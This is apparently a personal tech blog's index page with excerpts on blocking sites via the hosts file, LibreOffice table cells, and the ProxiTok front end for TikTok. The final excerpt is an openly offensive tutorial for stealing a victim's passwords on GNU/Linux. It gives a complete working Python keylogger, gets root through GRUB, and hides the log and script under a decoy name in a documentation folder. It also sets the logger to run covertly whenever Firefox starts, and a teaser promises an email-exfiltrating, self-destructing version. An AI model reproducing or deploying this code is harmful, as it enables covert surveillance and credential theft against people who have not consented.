To block websites you can use a browser extension (such as Block
Site), a proxy server (such as
Squid), but there is
also the option of editing the hosts
file, a method that consumes very
little RAM and, unlike the browser extension, will work for any browser
or program Keep reading Block websites: hosts
file
Block websites:
How to delete table cells in LibreOffice Writer
To delete cells the only option is removing its borders. Here I have a table from which I want to remove three of the top cells that are leftover:
To do this, click on the Borders button that appears below when we select the table cells we want to delete and then click on No Borders, as I do in the following image:
In case you get lost, here is also a video demonstration:
Here is the result:
TikTok privately with ProxiTok
TikTok is a centralised social network and requires the use of proprietary software. It is practically impossible to query TikTok with the browser in a decent way without losing privacy or freedom... unless you use another interface, such as ProxyTok, which I describe in this article.
The ProxiTok interface is simple. You can go to trending content, discover users and search by username, tag, TikTok URL, music identifier and video identifier.


The project was launched on 1 January 2022, so it is quite young and more features are expected to be added. To automatically redirect to ProxiTok you can install the LibRedirect extension, which also prevents other privacy-harmful websites.
There are several public instances, and it is possible to install one on your own server.
Python keylogger for GNU/Linux. Send information by email and self-destruct
In this article I show you how to program an advanced keylogger that sends messages by email and self-destructs after a certain date.
Keep reading Python keylogger for GNU/Linux. Send information by email and self-destructBasic keylogger for GNU/Linux to steal passwords and typed information
A simple way to steal passwords is to install a keylogger on the victim's computer. I am going to show how to do this on GNU/Linux using the Python programming language.
The first thing to do is to obtain superuser permissions. If the computer is managed by us, we already know the password. If not, we can get superuser access from GRUB. With the necessary permissions, we are free to install the keylogger.
First of all, the pynput
library must be installed executing...
sudo pip install pynput
Next, we need to write the keylogger. This is the code we will use:
#!/usr/bin/env python3
from pynput.keyboard import Key, Listener
import logging
log_dir = "/usr/share/doc/python3/"
logging.basicConfig(filename=(log_dir + "log"), \
level=logging.DEBUG, format='%(asctime)s: %(message)s')
def on_press(key):
logging.info(str(key))
with Listener(on_press=on_press) as listener:
listener.join()
The keylog is stored in log_dir
. In this case, I have specified the
GNU/Linux Python 3 documentation folder. The keylogger can also be
stored in the same directory, perhaps with the name
compile_docs.py
or something similar to avoid attracting
attention. Ideally, choose a folder that the victim is not going to
enter to prevent them from realising what we are doing.
The last step would be to run the program every time the computer is turned on or a program is started without the victim noticing. If, for example, we want to start the keylogger every time the user opens Firefox, we can modify the Firefox command. Keep reading Basic keylogger for GNU/Linux to steal passwords and typed information